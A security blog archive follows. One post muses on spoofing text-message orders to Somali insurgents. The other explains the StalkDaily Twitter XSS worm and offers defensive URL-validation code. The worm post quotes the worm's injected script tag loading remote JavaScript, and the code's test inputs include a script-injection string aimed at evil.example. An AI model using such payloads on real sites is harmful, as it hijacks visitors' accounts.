Category Archives: Security

Text Message Insurgents

Somalia is getting attention from BBC NEWS | Africa, for having a “text message insurgency”.

The leaders of the group – which has taken over swathes of central and southern Somalia – are unknown to their subordinates.

The middle lieutenants get their orders through text messages, or phone calls from recognised voices, giving them proof the instructions are coming from the right person.

The leaders of al-Shabab are called “emirs” and they do not usually come from the region they administer.

Although I see the attempt at novelty, the story feels a bit thin to me. The insurgents also use pickup trucks and machine guns. Why are text messages so different from other technologies in terms of our expectations for use by rebellious groups?

More interesting to me is the fact that these soldiers have a weak link to their superiors and are given no way to authenticate instructions other than a recognized voice. That offers nothing for SMS messages, which carry no voice at all. How do they establish trust? Unless there are keys or shared secrets involved, compromising the insurgent command structure therefore seems trivial. I wonder what would happen if the telecom(s) they use sent a “disband and return to work now” SMS. More sinister would be a “gather at x location and wear a bright red hat” instruction.

Twitter Worm

DCortesi has posted a nice summary of a script exploit in Twitter.

I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com">
<script src="hxxp://mikeyylolz.uuuq.com/x.js%3E">
</script></a>

Twitter accepted encoded markup in a profile’s URL field and rendered it back unescaped, so the injected JavaScript ran as soon as someone viewed a compromised Twitter profile page. Anyone who then viewed that visitor’s page was infected as well, and so forth.

An excellent way to prevent this on the client side is with NoScript or similar utilities that require you to whitelist JavaScript, as DCortesi mentions. You would be prompted to allow a uuuq.com script, at which point you hopefully would say no and realize the Twitter page is compromised. This is not foolproof, of course, as many would not realize that uuuq.com is suspicious. Another method of prevention is to avoid using Twitter. Haha.
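The server-side fix for this class of bug is the one the post does not spell out: validate the profile URL on input (scheme, and no raw or percent-encoded attribute-breaking characters) and escape it again on output. Below is an added example in JavaScript written for this page; it is not DCortesi’s code and not Twitter’s, and the function names, the rejection rules and the sample inputs (including the evil.example host) are all constructed here for illustration.

```javascript
// Added example, not from the original post or from Twitter.
// Two layers of defence for a user-supplied profile URL:
//  1. validate on input: only http(s), must parse as a URL, and no
//     characters that could close an attribute or open a tag, whether
//     literal or percent-encoded (the worm's payload used an encoded '>').
//  2. escape on output: never interpolate raw user data into HTML, even
//     if it passed validation when it was stored.

// Raw characters that end an attribute value or start a tag.
const FORBIDDEN = /[<>"'\s]/;
// Their percent-encoded forms: %3C '<', %3E '>', %22 '"', %27 "'".
const ENCODED_FORBIDDEN = /%(3c|3e|22|27)/i;

// Input-side check: returns true only for a plain http(s) URL.
function isSafeProfileUrl(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) {
    return false;
  }
  if (FORBIDDEN.test(raw) || ENCODED_FORBIDDEN.test(raw)) {
    return false;
  }
  let parsed;
  try {
    parsed = new URL(raw); // rejects unparseable strings
  } catch (e) {
    return false;
  }
  // Blocks javascript:, data:, vbscript: and anything else non-web.
  return parsed.protocol === "http:" || parsed.protocol === "https:";
}

// Output-side escaping for text and attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Render the profile link; a rejected URL is replaced with inert text so
// that a stored bad value can never reach the page as markup.
function renderProfileLink(raw) {
  if (!isSafeProfileUrl(raw)) {
    return "<span>(invalid URL removed)</span>";
  }
  const safe = escapeHtml(raw);
  return `<a href="${safe}" rel="nofollow noopener">${safe}</a>`;
}

// Constructed sample inputs (evil.example is a placeholder host).
const SAMPLES = [
  "http://www.stalkdaily.com",
  'http://www.stalkdaily.com"><script src="http://evil.example/x.js"></script>',
  "http://www.stalkdaily.com/%22%3E%3Cscript%3E",
  "javascript:alert(1)",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s), "->", isSafeProfileUrl(s) ? "accepted" : "rejected");
}
```

The two layers are deliberately redundant: the input check stops the obvious breakout attempts at write time, but only output escaping protects the page if a bad value ever reaches storage by another path, or if a later decoding step (double encoding, for instance) undoes what the input filter saw.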